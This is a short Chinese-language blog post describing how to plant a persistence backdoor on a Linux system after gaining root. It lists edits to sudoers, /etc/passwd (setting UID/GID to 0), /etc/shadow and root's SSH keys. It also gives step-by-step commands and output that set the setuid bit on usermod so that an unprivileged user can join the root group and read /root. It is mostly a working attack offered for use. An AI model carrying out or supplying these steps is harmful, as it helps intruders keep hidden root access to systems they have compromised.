Linux之SUID后门

SUID可以用来做后门,前提是你已经获取了root权限,且给予s权限的文件必须为二进制

0x00 为二进制文件添加s权限从而提升为root权限

  • 写sudoers添加用户 //最佳方案
  • vim /etc/passwd //将uid和gid改为0
  • vim /etc/shadow //密文覆盖
  • vim root .ssh/证书文件 .ssh这个文件夹和证书的权限要正确,要和原来一致

0x01 SUID主要作用可以是留后门

  • 在root权限下给usermod一个s权限

    # which usermod   #得到usermod的路径                             
    /usr/sbin/usermod
    # chmod u+s /usr/sbin/usermod
    # ls -l /usr/sbin/usermod
    -rwsr-x---. 1 root root 98680 Dec  7  2011 /usr/sbin/usermod
    
  • usermod给其他人一个x权限

    [root@localhost ~]# chmod o+x /usr/sbin/usermod
    [root@localhost ~]# ls -l /usr/sbin/usermod
    -rwsr-x--x. 1 root root 98680 Dec  7  2011 /usr/sbin/usermod
    
  • 切换到普通用户wyb

    [wyb@localhost ~]$ id wyb
    uid=500(wyb) gid=500(wyb) groups=500(wyb)
    [wyb@localhost ~]$ usermod -g root wyb
    [wyb@localhost ~]$ id wyb
    uid=500(wyb) gid=0(root) groups=0(root)
    [wyb@localhost ~]$ exit
    
  • 验证

    重新用wyb连接,此时即为root权限
    [wyb@localhost ~]$ cd /root  #若能切换到此目录即证明确实获得了root权限
    [wyb@localhost root]$ ls
    anaconda-ks.cfg  install.log  install.log.syslog
    

0x02 查找拥有s权限的文件

  • find / -perm -u=s -type f 2>/dev/null
若未作声明则文章版权归本人(@reber)所有,转载请注明原文链接:

可以返回顶部